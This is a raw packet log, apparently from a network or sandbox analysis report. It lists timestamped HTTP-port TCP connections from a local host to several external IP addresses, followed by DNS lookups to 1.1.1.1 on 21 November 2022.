                                                                                                                                                                                    Nov 21, 2022 19:25:04.714807034 CET8049909103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:04.714916945 CET8049909103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:04.714986086 CET8049909103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:04.715445042 CET4990980192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:04.715445042 CET4990980192.168.11.20103.63.2.175
                                                                                                                                                                                    Nov 21, 2022 19:25:04.890435934 CET8049909103.63.2.175192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:17.782949924 CET4991080192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:17.945452929 CET804991066.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:17.945646048 CET4991080192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:17.945808887 CET4991080192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:18.108000994 CET804991066.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:18.234039068 CET804991066.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:18.234078884 CET804991066.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:18.234286070 CET4991080192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:18.954301119 CET4991080192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:19.970130920 CET4991180192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:20.135273933 CET804991166.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:20.135503054 CET4991180192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:20.135612965 CET4991180192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:20.300555944 CET804991166.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:20.859338045 CET804991166.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:20.859400988 CET804991166.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:20.859693050 CET4991180192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:21.141241074 CET4991180192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.156905890 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.320677996 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.321052074 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.321582079 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.321672916 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.484502077 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.484615088 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.484663963 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.484708071 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.484761953 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.484942913 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.485049963 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.485066891 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.485270023 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.485455036 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.647805929 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.647902966 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.647954941 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648020029 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648066998 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648072004 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648192883 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648268938 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648627043 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648679018 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.648849964 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.649013042 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.651160002 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.652481079 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.655241013 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.811069012 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.811132908 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.811470032 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.811527014 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.811882019 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.951284885 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.951361895 CET804991266.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:22.951657057 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:23.328345060 CET4991280192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:24.343875885 CET4991380192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:24.507689953 CET804991366.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:24.507983923 CET4991380192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:24.508055925 CET4991380192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:24.671665907 CET804991366.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:24.779979944 CET804991366.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:24.780023098 CET804991366.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:24.780302048 CET4991380192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:24.780436993 CET4991380192.168.11.2066.29.151.40
                                                                                                                                                                                    Nov 21, 2022 19:25:24.943967104 CET804991366.29.151.40192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:29.797277927 CET4991480192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:29.933459044 CET804991445.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:29.933916092 CET4991480192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:29.934031963 CET4991480192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:30.073663950 CET804991445.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:30.073774099 CET804991445.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:30.073846102 CET804991445.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:30.073960066 CET4991480192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:30.074390888 CET804991445.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:30.074481964 CET804991445.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:30.074713945 CET4991480192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:30.075084925 CET4991480192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:30.936161995 CET4991480192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:31.951529026 CET4991580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:32.086060047 CET804991545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:32.086464882 CET4991580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:32.086532116 CET4991580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:32.261699915 CET804991545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:33.075741053 CET804991545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:33.075831890 CET804991545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:33.075901985 CET804991545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:33.076163054 CET4991580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:33.076294899 CET804991545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:33.076423883 CET804991545.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:33.076581955 CET4991580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:33.076581955 CET4991580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:33.091869116 CET4991580192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.107372046 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.240952969 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.241149902 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.241780043 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.241842031 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.241880894 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375230074 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375250101 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375258923 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375416040 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375427008 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375457048 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375483036 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375525951 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375538111 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375557899 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375591040 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375602007 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375760078 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.375864029 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.376008987 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.376213074 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.419528008 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509299994 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509371996 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509418011 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509468079 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509514093 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509561062 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509573936 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509607077 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509654045 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509660006 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509699106 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509725094 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:34.509746075 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643122911 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643228054 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643248081 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643286943 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643446922 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643573999 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643588066 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643697977 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643822908 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643836975 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643848896 CET804991645.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:34.643989086 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:35.247595072 CET4991680192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:36.263220072 CET4991780192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:36.397835970 CET804991745.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:36.398196936 CET4991780192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:36.398196936 CET4991780192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:36.533879042 CET804991745.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:36.533967018 CET804991745.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:36.534372091 CET4991780192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:36.534498930 CET4991780192.168.11.2045.33.23.183
                                                                                                                                                                                    Nov 21, 2022 19:25:36.668998003 CET804991745.33.23.183192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:41.575345993 CET4991980192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:41.589730978 CET8049919217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:41.589951038 CET4991980192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:41.590118885 CET4991980192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:41.604356050 CET8049919217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:41.610172033 CET8049919217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:41.610230923 CET8049919217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:41.610470057 CET4991980192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:42.598443031 CET4991980192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:43.609406948 CET4992080192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:43.623384953 CET8049920217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:43.623554945 CET4992080192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:43.623673916 CET4992080192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:43.637553930 CET8049920217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:43.642837048 CET8049920217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:43.642956972 CET8049920217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:43.643105030 CET4992080192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:44.624536991 CET4992080192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.638158083 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.652510881 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.652780056 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.653367043 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.653418064 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.653465986 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.667537928 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.667593956 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.667725086 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.667769909 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.667789936 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.667885065 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.667895079 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.667957067 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668035984 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668097973 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668114901 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668204069 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668212891 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668354988 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668415070 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.668576956 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.681809902 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.681895018 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.681915045 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682086945 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682154894 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682183981 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682228088 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682285070 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682307005 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682379961 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682429075 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682518959 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682538033 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682563066 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682565928 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682787895 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682934999 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.682974100 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.683073997 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.696459055 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.696485996 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.696502924 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.696521044 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.696732998 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.696758032 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.696775913 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.696979046 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.697037935 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.697057962 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.697074890 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.699820042 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.699851990 CET8049921217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:45.700076103 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:46.665168047 CET4992180192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:47.668361902 CET4992280192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:47.682605028 CET8049922217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:47.682775974 CET4992280192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:47.682972908 CET4992280192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:47.696934938 CET8049922217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:47.702331066 CET8049922217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:47.702351093 CET8049922217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:47.702764988 CET4992280192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:47.702831984 CET4992280192.168.11.20217.160.0.1
                                                                                                                                                                                    Nov 21, 2022 19:25:47.716898918 CET8049922217.160.0.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:52.773705006 CET4992380192.168.11.2096.43.100.185
                                                                                                                                                                                    Nov 21, 2022 19:25:53.785130024 CET4992380192.168.11.2096.43.100.185
                                                                                                                                                                                    Nov 21, 2022 19:25:55.793350935 CET4992380192.168.11.2096.43.100.185
                                                                                                                                                                                    Nov 21, 2022 19:25:59.808063984 CET4992380192.168.11.2096.43.100.185
                                                                                                                                                                                    Nov 21, 2022 19:26:07.821882010 CET4992380192.168.11.2096.43.100.185
                                                                                                                                                                                    Nov 21, 2022 19:26:14.851809025 CET4992380192.168.11.2096.43.100.185
                                                                                                                                                                                    Nov 21, 2022 19:26:15.851483107 CET4992380192.168.11.2096.43.100.185
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Nov 21, 2022 19:18:35.493346930 CET5590153192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:18:35.502964020 CET53559011.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:18:36.112219095 CET6378653192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:18:36.161132097 CET53637861.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:01.463752031 CET4924353192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:20:01.745240927 CET53492431.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:17.053335905 CET4958353192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:20:17.237447023 CET53495831.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:28.909107924 CET6199653192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:20:29.231910944 CET53619961.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:20:41.468679905 CET6105553192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:20:41.793445110 CET53610551.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:03.573359013 CET5163953192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:21:03.919292927 CET53516391.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:15.820621967 CET6259953192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:21:16.041558027 CET53625991.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:27.865325928 CET6012753192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:21:28.099550009 CET53601271.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:39.315855026 CET5314653192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:21:39.665604115 CET53531461.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:51.673074007 CET5101153192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:21:51.688684940 CET53510111.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:21:59.749109983 CET6098853192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:21:59.936533928 CET53609881.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:11.964452028 CET5839053192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:22:12.179430008 CET53583901.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:23.369260073 CET5735553192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:22:23.404802084 CET53573551.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:34.584777117 CET5643153192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:22:34.597623110 CET53564311.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:42.646064043 CET5115153192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:22:43.014297009 CET53511511.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:22:55.394001961 CET5793853192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:22:55.544795990 CET53579381.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:23:06.905802965 CET5604653192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:23:07.372371912 CET53560461.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:09.722239017 CET5602953192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:25:09.734272957 CET53560291.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:41.544147015 CET5173353192.168.11.201.1.1.1
                                                                                                                                                                                    Nov 21, 2022 19:25:41.574528933 CET53517331.1.1.1192.168.11.20
                                                                                                                                                                                    Nov 21, 2022 19:25:52.714576006 CET5114353192.168.11.201.1.1.1
